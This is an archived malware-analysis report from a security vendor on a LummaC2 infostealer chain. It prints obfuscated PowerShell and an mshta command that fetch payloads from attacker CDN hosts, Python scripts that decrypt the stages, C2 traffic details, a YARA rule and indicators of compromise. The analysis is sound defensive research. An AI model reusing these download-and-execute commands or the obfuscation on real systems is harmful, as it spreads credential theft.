{
	"id": "1a9859c5-1c28-422a-a0d1-7e38909f6bd1",
	"created_at": "2026-04-06T00:17:40.727521Z",
	"updated_at": "2026-04-10T13:11:35.648817Z",
	"deleted_at": null,
	"sha1_hash": "d8f442edafc32450f99af03b15430ce6906b935f",
	"title": "Obfuscated PowerShell leads to Lumma C2 Stealer",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1087575,
	"plain_text": "Obfuscated PowerShell leads to Lumma C2 Stealer\r\nArchived: 2026-04-05 13:28:09 UTC\r\nBlog\r\nPrefer audio? Listen to Rhys discuss this research on our Defend Your Time podcast episode.\r\nOverview\r\nIn recent months, we have observed an uptick in activities related to the LummaC2 infostealer. This report delves\r\ninto a new sample of LummaC2, which was initially discovered through a series of PowerShell commands that\r\nultimately downloaded and executed a payload on the targeted endpoint. Our analysis covers the different stages\r\nof the malware’s execution, from the initial PowerShell command to the subsequent payload decryption and\r\nexecution, providing insights into the tactics, techniques, and procedures (TTPs) used by the threat actor(s).\r\nWhat is Lumma Malware?\r\nLumma is an information-stealing malware written in C (programming language) that is designed to steal sensitive\r\ninformation. The malware has been observed being used as Malware-as-a-Service (MaaS), which was seen on\r\nRussian-speaking forums starting around 2022. Once the malware infects the target host, it attempts to steal\r\ninformation from the endpoint and then exfiltrate it to the command and control server. See more information\r\nhere: Lumma Malware family\r\nSample info\r\nSHA256: 2468e5bb596fa4543dba2adfe8fd795073486193b77108319e073b9924709a8a – First stage\r\nhttps://www.ontinue.com/resource/obfuscated-powershell-leads-to-lumma-c2-stealer/\r\nPage 1 of 12\n\nSHA256: 2caf283566656a13bf71f8ceac3c81f58a049c92a788368323b1ba25d872372e – Second stage\r\nBoth stages of the malware have been identified as LummaC2 Infostealer/Evader. We have also observed high\r\nentropy in some sections of the samples, which may indicate the presence of obfuscation. Neither file has a signed\r\nsignature, but they do contain file metadata that shows masquerading attempts. 
MITRE Technique ‘Masquerading’ (T1036).\r\nStatic Analysis\r\nFirst Stage:\r\nUpon initial discovery, we encountered this sample via a PowerShell encoded command that was attempting to communicate with a domain to download the LummaC2 malware sample.\r\n\"PowerShell.exe\" -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAG0AYQB0AG8ALQBjAGEAbQBwAC0AdgA0AC4AYgAtAGMA\r\nWith this encoded command, we can use CyberChef to decode the string. The encoded command was identified as Base64. By running the following steps, we can decode it. Once decoded, we can see the next stage of the intrusion: ‘mshta’ followed by the domain, a path and a potential file name. https://attack.mitre.org/techniques/T1059/001/\r\nMshta.exe is an executable designed to run Microsoft HTML Application files, known as ‘HTA’. As a legitimate Microsoft Windows binary, it is considered a LOLBin (Living off the Land binary), which allows actors to use the process for malicious purposes. Technique: T1218.005\r\nmshta https[:]//mato-camp-v4[.]b-cdn[.]net/kesty\r\nOnce the ‘kesty’ file is executed, we observe a second PowerShell script being run. This script carries an AES-encrypted HEX string, which it decrypts and executes. The key stored within the PowerShell command allows us to use some Python code to decrypt the HEX string and observe the next stage of the intrusion. 
I have separated the HEX string from the command to simplify the reading output.\r\n\"powershell[.]exe\" -w 1 -ep Unrestricted -nop function dhHMLxZL($zybwHU){return -split ($zybwHU -repl\r\nHex String\r\nB9EFAD8C773C4FE92E2E22914A07D7E3EFCBCCF45813B63684D5D0CE1F91BC8987190E70CCBAF581F2D0142BECBF89E5A6DCA\r\nfrom Crypto.Cipher import AES\r\nimport binascii\r\n\r\n# Mirrors the PowerShell helper of the same name: hex string -> raw bytes\r\ndef dhHMLxZL(hex_string):\r\n    return bytearray(binascii.unhexlify(hex_string))\r\n\r\n# Hexadecimal encoded string - payload (truncated in the report)\r\nhex_string = ('B9EFAD8C773C4FE92E2E22914A07D7E3EFCBCCF45813B63684D5D0CE1F91BC8987190E70CCBAF581F2D014\r\n# Decryption key (taken from the dhHMLxZL(...) call in the PowerShell command)\r\nkey_hex = '6D6B584A7142515A59457441736E454C'\r\nkey = dhHMLxZL(key_hex)\r\n# Initialization Vector: 16 zero bytes\r\niv = bytearray(16)\r\n# Decrypt the data with AES-CBC\r\ncipher = AES.new(key, AES.MODE_CBC, iv)\r\nencrypted_bytes = dhHMLxZL(hex_string)\r\ndecrypted_bytes = cipher.decrypt(encrypted_bytes)\r\ndecrypted_string = decrypted_bytes.decode('utf-8', errors='ignore')\r\nprint(decrypted_string)\r\nWithin the command, we observe ‘dhHMLxZL(‘6D6B584A7142515A59457441736E454C’)’, which we have identified as the decryption key. By using a Python script, we can decode this.\r\nThe outcome is the following decrypted PowerShell script:\r\niexfunction qZw($lKt, $ySk){[IO.File]::WriteAllBytes($lKt, $ySk)};function xoj($lKt){$VDFW = $env:Tem\r\nFunctions Defined:\r\nqZw: Writes byte data to a file.\r\nxoj: Expands a zip archive to the temporary directory and executes the first file found in the archive.\r\nVIR: Downloads data from a given URL using TLS 1.2.\r\nAec: Decodes an array of integers by subtracting 3836 from each value and converting the result to a character.\r\nmjq: Coordinates the downloading and execution of two zip files, U1.zip and U2.zip, from specific URLs. 
U2.zip contains “ashampoo.exe”.\r\nLooking at the functions defined, we have observed two potential zip files. From our observations, these files contain additional encoding of URLs. Using this information, we were able to decode the URL arrays using the ‘Aec’ function, and we obtained the following URLs:\r\nhttps[:]//campzips1[.]b-cdn[.]net/U1.zip\r\nhttps[:]//campzips1[.]b-cdn[.]net/U2.zip\r\n# Mirrors the PowerShell 'Aec' function: subtract 3836 from each integer and map it to a character\r\ndef Aec(KUk):\r\n    wqg = 3836\r\n    LTu = ''.join([chr(ChY - wqg) for ChY in KUk])\r\n    return LTu\r\n\r\n# Encoded URL arrays (truncated in the report)\r\nurl1_encoded = [3940, 3952, 3952, 3948, 3951, 3894, 3883, 3883, 3935, 3933, 3945, 3948, 3958, 3941, 3\r\nurl2_encoded = [3940, 3952, 3952, 3948, 3951, 3894, 3883, 3883, 3935, 3933, 3945, 3948, 3958, 3941, 3\r\n# Decoded URLs\r\nurl1 = Aec(url1_encoded)\r\nurl2 = Aec(url2_encoded)\r\nprint(url1)\r\nprint(url2)\r\nLooking at the URLs on VirusTotal, we have identified a PE file called BitlockerToGO Execution. We have also discovered that the process ‘ashampoo.exe’ was stored within ‘U2.zip,’ which we believe to be the secondary stage dropped malware known as Lumma.\r\nSecond Stage:\r\nLooking into the next stage of the malware, some of the domains have been taken down or the threat actor has ceased activity. However, I was able to run the second stage sample ‘ashampoo.exe’ in a sandbox to perform some dynamic analysis, and this is the outcome.\r\nThe first thing I wanted to examine was its execution, to see what operations it performed and whether there were any additional child processes or other files being dropped.\r\nWe have discovered that ‘dllhost.exe’ was created as a child process. 
Malicious code is injected into ‘Bitlockertogo.exe,’ which then creates two additional processes that finally create ‘dllhost.exe.’ Additionally, we observed ‘dllhost.exe’ being used for command and control, with connections to the IP.\r\nFurthermore, we also observed an attempt at persistence. The process ‘mbssiy2zv5n8qjoazw144h95fvv3lwq.exe’ was observed being dropped from ‘ashampoo.exe’ \u003e ‘bitlockertogo.exe,’ which then creates the child process ‘mbssiy2zv5n8qjoazw144h95fvv3lwq.exe.’ When we view process 7, we can observe a successful write to the registry in ‘HKEY_USERS\\{USER Account HERE}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run.’ This is one of the most common spots for persistence, as it allows the actor to maintain access to the target endpoint. MITRE ATT\u0026CK T1547.001\r\nLooking further into the command and control of the malware, we can see from Figure 8 that ‘dllhost.exe’ is being used as the process for command and control. ‘Dllhost.exe’ is a known legitimate Microsoft Windows file, specifically a COM surrogate process used by Windows to load COM objects.\r\nActors abuse this process by injecting code into it, instructing it to perform unauthorized actions. This technique is commonly known as Process Injection. MITRE Technique T1055.\r\nHere, we have the PCAP of the malicious connection. From the dynamic analysis, we observed a connection to IP ‘188.68.220[.]48.’ By setting this as the destination, we can see the communication between the source and destination IP addresses. 
We observed multiple intervals of HTTP communication with the target C2 server.\r\nUpon further analysis of the PCAP file from the dynamic analysis, we observed a ‘POST’ request to ‘vamplersam[.]info,’ where the request is sending data to the endpoint ‘/cfg.’ This could indicate a stream of data or commands being exchanged between the C2 server and the target endpoint. Although I am filtering the analysis to the target IP address, it’s clear that if a POST request is being made, commands are likely being sent to the target device from the C2 server in order to receive data.\r\nThe way this works is that the actor will send a command, such as ‘get file’ or ‘download file,’ allowing them to collect data from the target device. This falls under the MITRE tactics Collection and Exfiltration. Another common aspect of Lumma is that it uses the User-Agent ‘TeslaBrowser/5.5.’ However, in this sample, when examining the HTTP headers, we do not see this User-Agent. This could be because the actor is using a custom client to send the requests, likely to avoid detection, knowing this User-Agent was used in prior samples.\r\nBehavioural Processes\r\nMITRE ATTACK Techniques\r\nYARA Rule\r\nimport \"pe\"\r\n\r\nrule LummaC2_Suspicious_Network_Activity {\r\n    meta:\r\n        author = \"Rhys Downing\"\r\n        description = \"Detects suspicious repeated HTTP POST requests to C2 server from dllhost.exe\"\r\n        reference = \"Lumma C2 Infostealer\"\r\n        date = \"2024-08-11\"\r\n        version = \"1.1\"\r\n        tlp = \"WHITE\"\r\n    strings:\r\n        // Target the specific HTTP POST request to the /cfg endpoint\r\n        $post_request_1 = \"POST /cfg HTTP/1.1\" ascii\r\n        $post_request_2 = \"POST /cfg HTTP/1.1\" wide\r\n        // Target the Host header indicating communication with the C2 server\r\n        $host_header_1 = \"Host: vamplersam.info\" ascii\r\n        $host_header_2 = \"Host: vamplersam.info\" wide\r\n        // Target the IP address involved in the communication\r\n        $ip_address = \"188.68.220.48\" ascii\r\n        // Target the Content-Type for POST data\r\n        $content_type_1 = \"Content-Type: application/x-www-form-urlencoded\" ascii\r\n        $content_type_2 = \"Content-Type: application/x-www-form-urlencoded\" wide\r\n    condition:\r\n        // Match conditions for either ASCII or wide character encoding;\r\n        // the group is parenthesised because 'and' binds tighter than 'or' in YARA\r\n        (\r\n            (all of ($post_request_1, $host_header_1, $content_type_1, $ip_address)) or\r\n            (all of ($post_request_2, $host_header_2, $content_type_2, $ip_address))\r\n        )\r\n        and\r\n        // Ensure that the process is dllhost.exe\r\n        // (pe.exports() checks for an exported symbol of this name in the scanned PE;\r\n        // it does not identify the process that owns the scanned memory)\r\n        pe.exports(\"dllhost.exe\")\r\n}\r\nMitigations\r\nEndpoint Protection and Monitoring\r\nEDR Solutions: Deploy and configure Endpoint Detection and Response (EDR) solutions to detect and respond to suspicious behaviours, such as process injection, unusual process execution (e.g., dllhost.exe with network activity), and file modifications.\r\nAttack Surface Reduction (ASR) Rules\r\nImplement ASR rules to block potentially malicious behavior. 
Key rules to consider include:\r\nBlock executable content from email and webmail clients.\r\nUse advanced protection against credential theft.\r\nBlock executable files from running unless they meet a prevalence, age, or trusted list criterion.\r\nIndicators of compromise\r\nURLs:\r\nhttps[:]//mato-camp-v4.b-cdn[.]net\r\nhttp[:]//campzips1.b-cdn[.]net/U1.zip\r\nhttps[:]//campzips1.b-cdn[.]net/U2.zip\r\nhttp[:]//sulphurhsum[.]shop\r\nhttp[:]//rainbowmynsjn[.]shop\r\nhttp[:]//assumedtribsosp[.]shop\r\nhttp[:]//chippyfroggsyhz[.]shop\r\nhttp[:]//ufort[.]info\r\nhttps[:]//bitbucket[.]org/dultevupse1/zeus/downloads/108GoDll.exe\r\nhttp[:]//creepydxzoxmj[.]shop\r\nhttp[:]//boattyownerwrv[.]shop\r\nhttp[:]//vamplersam[.]info/cfg\r\nhttps[:]//sulphurhsum[.]shop/api\r\nhttp[:]//budgetttysnzm[.]shop\r\nhttp[:]//definitonizmnx[.]shop\r\nhttp[:]//empiredzmwnx[.]shop\r\nIP Addresses:\r\n188.68.220[.]48 – Country: Russia\r\n185.166.143[.]48 – Country: Russia – Resolved Domain: bitbucket[.]org\r\nFile Names/Hashes:\r\nashampoo.exe – SHA256: 2caf283566656a13bf71f8ceac3c81f58a049c92a788368323b1ba25d872372e\r\nKesty[1] – SHA256: 2468e5bb596fa4543dba2adfe8fd795073486193b77108319e073b9924709a8a\r\n108GoDll.exe – SHA256: 32db2729ef61f2a19c4c3632f0de727476b7fce0d68b5dcec8d0246042a8e398\r\nmbssiy2zv5n8qjoazw144h95fvv3lwq.exe – SHA256: 32db2729ef61f2a19c4c3632f0de727476b7fce0d68b5dcec8d0246042a8e398\r\nSource: https://www.ontinue.com/resource/obfuscated-powershell-leads-to-lumma-c2-stealer/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.ontinue.com/resource/obfuscated-powershell-leads-to-lumma-c2-stealer/"
	],
	"report_names": [
		"obfuscated-powershell-leads-to-lumma-c2-stealer"
	],
	"threat_actors": [],
	"ts_created_at": 1775434660,
	"ts_updated_at": 1775826695,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d8f442edafc32450f99af03b15430ce6906b935f.pdf",
		"text": "https://archive.orkl.eu/d8f442edafc32450f99af03b15430ce6906b935f.txt",
		"img": "https://archive.orkl.eu/d8f442edafc32450f99af03b15430ce6906b935f.jpg"
	}
}